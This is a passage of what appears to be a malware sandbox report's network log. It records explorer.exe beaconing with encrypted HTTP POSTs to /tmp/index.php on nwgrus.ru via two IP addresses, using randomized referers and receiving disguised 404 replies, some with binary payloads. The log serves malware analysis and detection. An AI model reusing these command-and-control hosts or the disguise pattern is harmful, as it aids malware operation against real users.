                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            26192.168.2.449815177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:18:08.127762079 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://mhabccdcfgoeshi.com/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 299
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:18:08.127770901 CEST299OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 3c 31 cd 85
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu<1o']Bgx3s /,'iWU6F~`9Nc($4v|?-yU18h^o`n(,NqNhU98`
                                                                                                                                            Oct 4, 2024 19:18:09.566529989 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:09 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            27192.168.2.449819177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:18:09.710045099 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://qhqjabyurfswwyf.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 165
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:18:09.710074902 CEST165OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 33 1b f8 9d
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu3Z<_\{+S(]<X\2KMs4+< 2"c2*p(
                                                                                                                                            Oct 4, 2024 19:18:11.147438049 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:10 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            28192.168.2.449826177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:18:11.157788992 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://jfivjaggias.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 340
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:18:11.157804966 CEST340OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 3c 1a af 83
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu<Y=gYqIE7yyU[VXR%?5V"30pp;P*!|*:+A* &PK/G`#@}c1:
                                                                                                                                            Oct 4, 2024 19:18:12.412683010 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:12 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            29192.168.2.449833177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:18:12.443442106 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://oecmcnbulbfndgqw.com/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 298
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:18:12.443476915 CEST298OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 59 4c a6 f1
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuYL}[Yv`3fk-Ctr(?6?QF+sQ$8f%z7eV6;0F67Z1UmXi+?g+QD:
                                                                                                                                            Oct 4, 2024 19:18:13.846260071 CEST223INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:13 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 08 65 42 f1 3a 0f e9 ff 09 fc 8c e5 e5 23 98 2b cd fb 2c 5e 10 dd db c0 da 61 d9 2e 19 12 8b 07 99 16 74 52 43 f2 99 67 f4 75 a0 49 4e 1b 77 2c 12 da 20 ec 32 0b a9 86 7c 7d c8
                                                                                                                                            Data Ascii: #\6eB:#+,^a.tRCguINw, 2|}


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            30192.168.2.449864177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:18:18.133738041 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://tpydbdrotfs.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 325
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:18:18.133766890 CEST325OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 11 6b 2c 90 f4 76 0b 75 51 3f bd f5
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA ,[k,vuQ?1@ZS0/K"$hVt%[1RIAS=+Fvp;LOOOk=xes}J+eO%tMp+ghu_w3!p
                                                                                                                                            Oct 4, 2024 19:18:19.448740959 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:19 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            31192.168.2.450035177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:19:28.826828003 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://qrkdkbqfwfclqg.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 131
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:19:28.826857090 CEST131OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 47 b0 81
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vuXGpsNVoeB*26YE}gR
                                                                                                                                            Oct 4, 2024 19:19:30.096446991 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:19:29 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                            Data Ascii: r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            32192.168.2.450036177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:19:36.436177969 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://owadrehnugjdh.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 283
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:19:36.436213970 CEST283OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 00 ee bd
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vu+kXD@pHtbOgDdT3]hW*c&$%aII-+q(G7M3W{{vRp
                                                                                                                                            Oct 4, 2024 19:19:37.690862894 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:19:37 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                            Data Ascii: r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            33192.168.2.450037177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:19:45.959671021 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://wyvokdhlnlrsvuh.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 137
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:19:45.959683895 CEST137OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 06 e1 f0
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vuHRnq?8]Nl- ];6Q#\I
                                                                                                                                            Oct 4, 2024 19:19:47.222836971 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:19:46 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                            Data Ascii: r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            34192.168.2.450038177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:19:57.426565886 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://daglechfqxgadh.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 142
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:19:57.426613092 CEST142OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 07 bc 8a
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vuU\;MfbsUT )U&w[$F",(_0$
                                                                                                                                            Oct 4, 2024 19:19:58.725389004 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:19:58 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                            Data Ascii: r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            35192.168.2.450039180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:20:12.845024109 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://lshvsjxacvhbre.com/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 349
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:20:12.845060110 CEST349OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 18 af f3
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vusa@>'zGP$S|F1:1]Wj]P;Gj1R1Y9`nX9?$=[t:i\z[9@m>e&7
                                                                                                                                            Oct 4, 2024 19:20:14.259684086 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:20:14 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                            Data Ascii: r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            36192.168.2.450040180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:20:26.766762018 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://nweaheqhdcfapi.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 289
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:20:26.766762018 CEST289OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 37 ae 9b
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vu]7"vfL8@xFLc/t[""[}6HS51Y3j#>ESH,q1]9XL%Pf2B.s6(Q&z
                                                                                                                                            Oct 4, 2024 19:20:28.126101017 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:20:27 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                            Data Ascii: r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            37192.168.2.450041180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:20:41.512470007 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://jwpopyrbbpjc.com/
